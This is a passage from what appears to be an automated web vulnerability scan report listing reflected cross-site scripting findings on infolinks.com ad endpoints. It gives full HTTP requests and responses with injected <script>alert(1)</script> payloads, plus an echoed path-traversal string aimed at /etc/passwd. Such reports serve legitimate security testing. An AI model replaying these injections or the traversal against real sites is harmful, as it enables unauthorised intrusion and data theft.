Date: Sat, 17 Sep 2011 01:00:30 GMT
Connection: close

data=({rid:'da106062-18d8-449e-805a-c1785d15d58b73873<script>alert(1)</script>96519b5c9d9',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'things':{auth:{ssd:'UPwq7UoNKadKvvbzD00CNRdwrWSPYZs_PO3spp54Imzon1y1ud ...[SNIP]...
4.162. http://rt1302.infolinks.com/action/getads.htm [lid parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://rt1302.infolinks.com |
| Path: | /action/getads.htm |
Issue detail
The value of the lid request parameter is copied into the HTML document as plain text between tags. The payload 67fef<script>alert(1)</script>6a7e468dd77 was submitted in the lid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /action/getads.htm?lid=267fef<script>alert(1)</script>6a7e468dd77&rid=da106062-18d8-449e-805a-c1785d15d58b&jsv=222.0.4&rts=1316239066211&bdc=1&cfv=10.3&prod_t=intext&sdata=make%20a%20move&ssd=2hAWURkIJ_4Kds6UXz8WznN_QzZNa4LBfSz7zrBLnZj6T2tXKUdAdSXXIuL_seS2dbU_ZFCbwoh9YlYKCjDYoQOhoiVPotApHz37yLFQrUZBj7NspVySPoNBTt03nMBOTHL4pxnayBF8i9niJ3xJY-bKwwT5OoYGYMJdaBrlT64ForO97xbWXA&sk=70&cs=9XaOKKLdbnq0zTFAwKWvjw HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4

Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cpc=100; Domain=infolinks.com; Expires=Sat, 17-Sep-2011 01:59:51 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 846
Date: Sat, 17 Sep 2011 00:59:50 GMT
Connection: close

INFOLINKS.setAdData( { lid : "267fef<script>alert(1)</script>6a7e468dd77",sentence : "make+a+move", width : 0,height : 0,ads : [ { template : 'text', title : 'Mover', text : 'Compare Top-Rated Mover In Your Area. Get ...[SNIP]...
4.163. http://rt1701.infolinks.com/action/doq.htm [rid parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://rt1701.infolinks.com |
| Path: | /action/doq.htm |
Issue detail
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload b1512<script>alert(1)</script>2de489fe3894dc8d1 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver.
Request
GET /action/doq.htm?pcode=utf-8&r=1316238789823.1&purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fnews%2F&makey=47425c40415c4340415c4342445d434143444040424a40464147405d69737677&ref=www%2Etoofab%2Ecom%2F2011%2F09%2F16%2Fexclusive%2Dmelissa%2Drivers%2Dsplits%2Dwith%2Dboyfriend%2F&ptitle=hollywood%20news%2Cred%20carpet%20fashion%20and%20celebrity%20hairstyles%20%7C%20toofab%2Ccom&pid=159065&wsid=1&by=f&ptxt=latest%7Cnews%7Cmost%7Cread%7C%C2%A9%202011%20ehm%20productions%7Cinc%7Call%20rights%20reserved%7Creproduction%20in%20whole%20or%20in%20part%20without%20permission%20is%20prohibited%7Cin%20partnership%20with%20tmz%7Ccom%7C&jsv=222%2E0%2E4&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%20bikini%20bodies%2Ccelebrity%20style%2Ccelebrity%20dresses%2Ccelebrity%20jewelry%2Ccelebrity%20handbags&crtw=0&twnum=28&crtss=30&pdesc=get%20the%20latest%20celebrity%20gossip%2Chollywood%20news%2Ccovering%20red%20carpet%20fashion%20and%20events%2Ccelebrity%20hairstyles%20and%20celebrity%20beauty%20buzz%20at%20toofab%21&crt=0&pimgs=toofab%7Clove%20it%7Clive%20it%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7Ccelebs%20love%20camilla%20and%20marc%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7Cmark%20ballas%20and%20pia%20tosano%20split%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7Cnew%20york%20fashion%20week%20finale%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7Ctoday%27s%20celebrity%20birthdays%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7Chot%20shots%7Cseptember%2016%7C2011%7Cgeorge%20clooney%27s%20many%20former%20flames%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C2011%20emmy%20awards%7Cwho%20should%20win%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7Ctoofab&rts=1316238789824&csilv=4%2E0%2E60531%2E0&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7C1%20comment%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7C14%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7C3%20comments%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7C0%20comments%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7C13%20comments%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7C2%20comments%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7C8%20comments%7Ccelebs%20love%20camilla%20and%20marc%7C0%20comments%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7C0%20comments%7Cmark%20ballas%20and%20pia%20tosano%20split%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7C0%20comments%7Cnew%20york%20fashion%20week%20finale%7C1%20comment%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7C0%20comments%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7C0%20comments%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7Ctoday%27s%20celebrity%20birthdays%7C0%20comments%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7C0%20comments%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7C0%20comments%7Chot%20shots%7Cseptember%2016%7C2011%7C2%20comments%7Cgeorge%20clooney%27s%20many%20former%20flames%7C0%20comments%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7C0%20comments%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7C2011%20emmy%20awards%7Cwho%20should%20win%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7C74%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7C38%20comments%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7C28%20comments%7Cevening%20quickies%7Cjessica%20simpson%27s%20wedding%20possibly